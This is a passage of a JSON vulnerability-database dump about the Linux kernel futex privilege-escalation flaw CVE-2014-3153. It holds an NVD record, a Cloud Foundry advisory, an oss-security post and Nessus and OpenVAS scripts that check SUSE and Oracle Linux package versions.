reference:\"kernel-pae-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"xen-kmp-pae-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "74462", "cpe": ["p-cpe:/a:novell:suse_linux:11:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:11:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:11:kernel-source", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:11:kernel-ec2", "p-cpe:/a:novell:suse_linux:11:kernel-trace-base", "p-cpe:/a:novell:suse_linux:11:kernel-default-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae", "p-cpe:/a:novell:suse_linux:11:kernel-xen-base", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:kernel-xen", "p-cpe:/a:novell:suse_linux:11:kernel-trace", "p-cpe:/a:novell:suse_linux:11:kernel-syms", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:11:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default-devel", "p-cpe:/a:novell:suse_linux:11:kernel-default-man", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:kernel-default-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default", "p-cpe:/a:novell:suse_linux:11:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:58:23", "description": "The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 5, "cvss3": {}, "published": "2014-06-07T14:55:00", "title": "CVE-2014-3153", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3153"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.14.4", "cpe:/o:linux:linux_kernel:3.14", "cpe:/o:linux:linux_kernel:3.14.3", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:linux:linux_kernel:3.14.2", "cpe:/o:linux:linux_kernel:3.14.1", "cpe:/o:linux:linux_kernel:3.14.5", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2014-3153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3153", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.14:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:-:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc8:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc2:*:*:*:*:*:*"]}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:44", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "CVE-2014-3153 Futex requeue exploit\n\n# \n\nImportant to Low\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Linux kernel through 3.14.5 \n\n# Description\n\nThe futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification. An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * Cloud Foundry final releases prior to v177 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * Cloud Foundry Runtime Deployments running Release v176 or earlier upgrade to v177 or higher. As of v177, Cloud Foundry is integrated with BOSH stemcell 2671, based on Ubuntu 14.04, which resolves this vulnerability. \n\n# Credit\n\nMany thanks to Pinkie Pie, the anonymous researcher who first discovered and reported this issue.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3153>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>\n * <http://threatpost.com/debian-urging-users-patch-linux-kernel-flaw>\n", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "CFOUNDRY:CB87545A2D6E3B6DCF68CD117331BD4E", "href": "https://www.cloudfoundry.org/blog/cve-2014-3153/", "title": "CVE-2014-3153 Futex requeue exploit | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "\r\n\r\nHi,\r\n\r\nThis was handled via linux-distros, hence the mandatory oss-security\r\nposting. The issue was made public earlier today, and is included in\r\nthis Debian advisory:\r\n\r\nhttps://lists.debian.org/debian-security-announce/2014/msg00130.html\r\n\r\n---\r\nCVE-2014-3153\r\n\r\n Pinkie Pie discovered an issue in the futex subsystem that allows a\r\n local user to gain ring 0 control via the futex syscall. An\r\n unprivileged user could use this flaw to crash the kernel (resulting\r\n in denial of service) or for privilege escalation.\r\n---\r\n\r\nI've attached patches by Thomas Gleixner (four e-mails, in mbox format),\r\nas well as back-ports of those by John Johansen of Canonical, who wrote:\r\n\r\n---\r\nFor anyone who is interested I've attached back ports of the patches to\r\n\r\n 3.13 - minor conflicts in patch 4. It has applied cleanly back to 3.2\r\nand\r\n 2.6.32 - conflict is in patches 3, and 4\r\n---\r\n\r\nAlexander\r\n\r\n", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:DOC:30788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30788", "title": "[oss-security] Linux kernel futex local privilege escalation (CVE-2014-3153)", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "ring 0 code execution via futex syscall.", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:VULN:13812", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13812", "title": "Linux privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-31T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850794", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0775-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850794\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0775-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix a\n critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n\n Indications:\n\n Everyone using the Linux Kernel on x86_64 architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0775-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.2.4_02_3.0.101_0.31~0.7.33\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64-base\", rpm:\"kernel-ppc64-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64-devel\", rpm:\"kernel-ppc64-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.2.4_02_3.0.101_0.31~0.7.33\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850859", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850859", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-2)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850859\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:22:14 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-2)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n\n Indications:\n\n Everyone using the Linux Kernel on s390x architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0837-2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-trace\", rpm:\"xen-kmp-trace~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3037", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123400", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3037.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123400\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:19 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3037\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3037 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3037\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3037.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~3.8.13~35.1.1.el6uek~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-headers\", rpm:\"dtrace-modules-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-provider-headers\", rpm:\"dtrace-modules-provider-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 